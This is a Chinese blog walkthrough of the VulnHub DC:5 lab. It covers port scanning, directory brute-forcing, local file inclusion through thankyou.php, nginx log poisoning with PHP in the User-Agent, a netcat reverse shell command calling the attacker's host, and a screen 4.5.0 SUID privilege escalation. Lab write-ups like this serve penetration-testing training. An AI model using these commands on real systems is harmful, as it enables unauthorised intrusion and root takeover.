VulnHub DC:5

最新推荐文章于 2024-03-22 18:31:22 发布
最新推荐文章于 2024-03-22 18:31:22 发布
阅读量252 收藏
点赞数
分类专栏: VulnHub 文章标签: kali linux 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43048653/article/details/110693853
版权
本文档详细介绍了针对VulnHub靶机DC:5的安全分析过程,包括使用nmap进行端口扫描,发现80端口上的nginx web服务。通过爆破目录,利用本地文件包含(LFI)漏洞,并尝试通过修改nginx日志文件执行代码。文章还展示了如何利用用户代理字符串注入PHP代码,以及通过提权脚本获得root权限的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机192.168.1.226

nmap起手。

 nmap -sT 192.168.1.226 -p-  -sV -sC -O

在这里插入图片描述
可以看到80端口用了nginx的web服务。
在这里插入图片描述
信息很少也就contact页面下有个输入框。这里可以猜测sql注入,和xss。漏洞,还有注意的是,这些页面都是PHP文件。参数变得尤其重要。

爆破目录

https://github.com/OJ/gobuster

gobuster -m dir -u 192.168.1.226 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

在这里插入图片描述
访问一下thankyou.php
在这里插入图片描述
似乎没什么可疑的地方,但实际上每次访问,底部的2018都换改变。这很奇怪。
在这里插入图片描述
可以看看footer.php。
在这里插入图片描述
很明显这里用了include(’’)函数。尝试能不能用file参数传进目录文件。也就是local file inclusion (LFI)本地文件包含漏洞。

http://192.168.1.226/thankyou.php?file=/etc/passwd

在这里插入图片描述

文件包含漏洞。

?file=/filepath不是唯一一种方式。我们也可以通过 wfuzz这样的工具去猜测可能性。
我们从nmap扫描中看到该web服务器时nginx,我们可以尝试去毒害 PHP文件从而执行代码.nginx的日志文件可以令thankyou.php执行代码。
访问?file=/etc/nginx/nginx.conf可以知道配置的访问log 文件在哪里。
在这里插入图片描述

这里有个问题。访问access.log,内容太多了,刚刚用nmap,gobuster的访问记录都在里面。为了看清里面的访问内容我不得不重置我的虚拟机。
在这里插入图片描述
这里需要通过用户代理字符串中发送PHP代码来实现。可以用burpsuite ,我这里选择用curl.

curl -A "<?= shell_exec('id');?>" http://192.168.1.226/thankyou.php

在这里插入图片描述
用nc反弹shell

nc -lvp 7777
curl -A "<?= shell_exec('nc 192.168.1.127 7777 -e /bin/bash');?>" http://192.168.1.226/thankyou.php

在这里插入图片描述
python 升级shell

python -c "import pty;pty.spawn('/bin/bash')"
^Z
stty raw -echo
fg

先用运行python代码,然后CTRL+z,后台运行,stty 后fg就能得到一个可以用ctrl-c,tab,向上的shell

提权。

利用提权检查脚本。

git clone https://github.com/sleventyeleven/linuxprivchecker

启动apache2
systemctl start apache2
在这里插入图片描述
把脚本传到web目录下。
cd到tmp目录下,然后下载

在这里插入图片描述

chmod +x linuxprivchecker.py 
./linuxprivchecker.py > 1.txt

运行
在这里插入图片描述
多了一个screens文件在这里插入图片描述
这里中这个screen可以进行suid提权。

searchsploit screen|grep 4.5

在这里插入图片描述
该脚本似乎并没有遵循应有的EOF标记。
此漏洞利用程序分为三个主要阶段。两个编译步骤和最后一个利用步骤。
我们可以将他拆分。这里需要注意的是脚本中的路径问题。

在这里插入图片描述

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

完成编译后,应该具有libhax.so,rootshell和script.sh。
把这三个文件传到dc5。
在这里插入图片描述

chmod +x script.sh
chmod +x rootshell
./script.sh

在这里插入图片描述
okok,去root目录下拿到最后的flag
在这里插入图片描述

VulnHubDC-5
weixin_39219503的博客
02-01 755
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-5,314/ 题目信息如下,只有一个flag Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
vulnhub DC:1靶场
weixin_46420165的博客
12-28 411
据某个帖子说是因为现在有一个在线的MD5数据库,可以查到很多MD5码的原文,因此Drupal 7的开发者认为不能再继续采用这种极不安全的方法了,因此Drupal 7采用了新型的Hash加密方法来确保密码安全。要成功完成这一挑战,您需要 Linux 技能、熟悉 Linux 命令行以及基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。网络是为 DHCP 配置的。它旨在对初学者来说是一个挑战,但它的难易程度取决于您的技能和知识以及您的学习能力。
vulnhub dc5
qq_44925740的博客
12-09 1291
vulnhub DC5前言一、信息收集二、漏洞利用三、 提权 前言 前几个DC感觉没什么新奇(DC2有个绕过rbash,git提权),就放了个5。 一、信息收集 nmap -sn 192.168.1.0/24 nmap -Pn 192.168.1.178 然后我脑瘫的疯狂怼111端口。。。转换思路到80端口 访问web页面 扫后台 footer.php 刷新一次跟上次不一样?? 在http://192.168.1.178/contact.php提交表单包含了footer.php而且刷新的时候footer
vulnhub-dc-5
qq_45414878的博客
06-13 273
vulnhub-dc-5知识点nmapLFI包含日志文件写马screen 4.5.0提权 vulnhub第六个靶机 靶机地址: https://www.vulnhub.com/entry/dc-5,314/. 知识点 nmap 用nmap查询局域网内存活的主机,发现靶机ip nmap -T4 192.168.40.0/24 用nmap进行更详细的探测,发现开着的端口和服务 端口 服务 80 http 111 rpcbind 49800 rpcbind LFI包含日志文件写马
Vulnhub-DC-5
T1me
10-28 153
入门系列第三弹DC-5 基本信息 下载地址:DC-5 靶机:VMware,NAT 靶机地址:192.168.172.136 攻击机:kali2 Flag:1个 渗透过程 0x01 初步信息搜集 nmap查看开放端口。发现80和111开放。 nmap -sV -p- 192.168.172.136 在详细扫描一下111,看看rpcbind的信息。 nmap -p 111 --script=rpcinfo 192.168.172.136 首先通过msf扫描一下,看看是否存在可利用漏洞,发现没有。 那看来
vulnhubdc5
qq_54030686的博客
06-13 381
这个靶场延续了dc系列一贯直白的套路,直接提升权限,实际操作中还是存在着一些未能解决的问题,话不多说,直接干 官方wp地址 主机发现 这里介绍一下 ip地址之后的24,代表24个字节,A段,B段,C段各占8个字节,也就是每一个段共有256个数字,检测B段的话,0/16,检测A段的0/8 目标为139,本机IP为128,进行端口检测 不知道为什么,我这边多个了45530端口,有可能是因为我做完的缘故,但是不影响,共有三个端口80为http服务,111为rpcbind服务,45530不晓得是哪个服务 谷歌大法中
vulnhub DC: 6
箭雨镜屋
01-12 927
渗透思路: nmap扫描---->wpscan枚举wordpress用户---->wpscan暴力破解wordpress用户名密码---->利用RCE漏洞getshell---->sudo提权
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 6076
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub靶机:DC-4暴力破解——新手进阶4
m0_75051044的博客
03-22 1777
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码进行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite进行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3166
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
vulnhub--DC5
weixin_55129870的博客
05-19 403
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
VulnhubDC-5提权
ST0new的博客
07-23 791
文章目录前言作者描述复现环境开始复现查看flag 前言 本靶机只做学习使用,不要将其利用于非法途径。 终于来到了倒数第二关,这一关将难度增加,所以我们需要借助搜索工具来帮助我们完成 作者描述 DC-5是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 这个计划是为了让DC-5更上一层楼,所以这对初学者来说可能不太好,但对有中级或更好经验的人来说应该没问题。时间会证明一切(反馈也会证明)...
看完这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6906
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
VulnHub——DC-5(具体漏洞详解)
高野02blog
12-29 1190
DC-5 这是DC-5的描述,从中得到一些关键信息。 开始 nmap扫描 确定IP地址后端口扫描 发现80端口 使用kali自带工具dirbuster遍历目录 AWVS对网站扫描并没发现重大漏洞 发现只有以下这个界面存在交互 访问footer.php页面时发现了描述中会随着页面刷新改变的东西 我们猜测thankyou.php中incloude()包含了footer.php, 如果是动态包含的路径就可能存在LFI漏洞 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 5069
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
常见病虫识别样本-数据集
05-19
来自2021年软件杯A4赛道的数据集,同时我们自己在网上搜集到了对应害虫的幼虫形态,总共15种害虫,同时对每一种害虫都做了标注,存放在Annotations文件里面。 注意:数据分为图片和Xml文件,xml文件里面是框框的坐标,数据有点少,大家也可以自行添加一点,有几个XML文件是空的。
餐馆点餐管理系统-数据库课程设计-MySQL
05-19
《餐馆点餐管理系统——基于Java和MySQL的课程设计解析》 在信息技术日益发达的今天,餐饮行业的数字化管理已经成为一种趋势。本次课程设计的主题是“餐馆点餐管理系统”,它结合了编程语言Java和数据库管理系统MySQL,旨在帮助初学者理解如何构建一个实际的、具有基本功能的餐饮管理软件。下面,我们将深入探讨这个系统的实现细节及其所涉及的关键知识点。 我们要关注的是数据库设计。在“res_db.sql”文件中,我们可以看到数据库的结构,可能包括菜品表、订单表、顾客信息表等。在MySQL中,我们需要创建这些表格并定义相应的字段,如菜品ID、名称、价格、库存等。此外,还要设置主键、外键来保证数据的一致性和完整性。例如,菜品ID作为主键,确保每个菜品的唯一性;订单表中的顾客ID和菜品ID则作为外键,与顾客信息表和菜品表关联,形成数据间的联系。 接下来,我们来看Java部分。在这个系统中,Java主要负责前端界面的展示和后端逻辑的处理。使用Java Swing或JavaFX库可以创建用户友好的图形用户界面(GUI),让顾客能够方便地浏览菜单、下单。同时,Java还负责与MySQL数据库进行交互,通过JDBC(Java Database Connectivity)API实现数据的增删查改操作。在程序中,我们需要编写SQL语句,比如INSERT用于添加新的菜品信息,SELECT用于查询所有菜品,UPDATE用于更新菜品的价格,DELETE用于删除不再提供的菜品。 在系统设计中,我们还需要考虑一些关键功能的实现。例如,“新增菜品和价格”的功能,需要用户输入菜品信息,然后通过Java程序将这些信息存储到数据库中。在显示所有菜品的功能上,程序需要从数据库获取所有菜品数据,然后在界面上动态生成列表或者表格展示。同时,为了提高用户体验,可能还需要实现搜索和排序功能,允许用户根据菜品名称或价格进行筛选。 另外,安全性也是系统设计的重要一环。在连接数据库时,要避免SQL注入攻击,可以通过预编译的PreparedStatement对象来执行SQL命令。对于用户输入的数据,需要进行验证和过滤,防止非法字符和异常值。 这个“餐馆点餐管理系统”项目涵盖了Java编程、数据库设计与管理、用户界面设计等多个方面,是一个很好的学习实践平台。通过这个项目,初学者不仅可以提升编程技能,还能对数据库管理和软件工程有更深入的理解。在实际开发过程中,还会遇到调试、测试、优化等挑战,这些都是成长为专业开发者不可或缺的经验积累
校园服务平台系统 2025免费毕设附带论文 SpringBoot+Vue.js
05-19
2025免费毕设附带论文 SpringBoot+Vue.js 启动教程: https://www.bilibili.com/video/BV11ktveuE2d/?share_source=copy_web 二开教程:https://www.bilibili.com/video/BV18i421i7Dx/?share_source=copy_web 讲解视频:https://www.bilibili.com/video/BV1Tb421n72S/?share_source=copy_web
BlueCoreTM3-Flash:蓝牙2.4GHz系统的单芯片射频与基带IC集成电路解决方案 蓝牙技术
最新发布
05-19
内容概要:本文详细介绍了BlueCoreTM3-Flash,一款专为蓝牙2.4GHz系统设计的单芯片射频和基带IC。文章首先概述了BlueCoreTM3-Flash的基本特性,包括高集成度、高速处理能力和大容量内存。接着深入探讨了其底层驱动程序和固件代码的设计,展示了如何通过寄存器操作、中断处理和数据处理来实现高效的蓝牙通信和数据传输。最后,文章列举了BlueCoreTM3-Flash在智能耳机、智能手表等多种蓝牙设备中的实际应用场景,强调了其在物联网和智能设备领域的广泛应用前景。 适合人群:对蓝牙技术和集成电路感兴趣的电子工程师、硬件开发者和技术爱好者。 使用场景及目标:①了解BlueCoreTM3-Flash的技术特性和优势;②掌握其底层驱动程序和固件代码的工作原理;③探索其在各类蓝牙设备中的具体应用。 其他说明:本文基于CSR公司的官方资料和技术文档,旨在帮助读者全面理解BlueCoreTM3-Flash的功能及其在蓝牙设备中的重要地位。
vulnhub DC
01-13
### VulnHub DC 系列 渗透测试 实验环境下载 #### 下载途径 对于希望参与基于VulnHubDC系列的渗透测试练习者来说,获取实验环境的第一步是从[VulnHub](https://www.vulnhub.com/)官方网站下载相应的虚拟机镜像...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值